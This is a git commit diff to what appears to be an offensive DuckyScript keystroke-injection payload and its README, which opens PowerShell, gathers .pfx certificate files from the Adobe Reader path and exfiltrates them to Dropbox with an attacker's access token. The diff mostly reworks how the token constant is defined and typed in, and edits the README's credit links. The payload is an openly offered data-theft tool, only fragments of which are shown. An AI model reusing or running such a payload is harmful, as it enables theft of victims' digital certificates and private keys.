optimization
parent
52fcb44d2f
commit
59a64c7d1d
|
@ -21,7 +21,7 @@ Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx
|
|||
|
||||
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||
|
||||
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
|
||||
`DEFINE #DROPBOX_ACCESS_TOKEN "example"`
|
||||
|
||||
## Credits
|
||||
|
||||
|
@ -35,17 +35,11 @@ Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx
|
|||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Discord
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
|
|
@ -15,7 +15,7 @@ REM - Internet Connection
|
|||
|
||||
|
||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||
DEFINE DROPBOX_ACCESS_TOKEN example
|
||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||
|
||||
|
||||
GUI r
|
||||
|
@ -31,10 +31,7 @@ STRINGLN
|
|||
END_STRINGLN
|
||||
|
||||
REM Setting about exfiltration
|
||||
STRING $accessToken = "
|
||||
STRING DROPBOX_ACCESS_TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
|
||||
|
||||
STRINGLN
|
||||
$authHeader = @{Authorization = "Bearer $accessToken"}
|
||||
|
|
Loading…
Reference in New Issue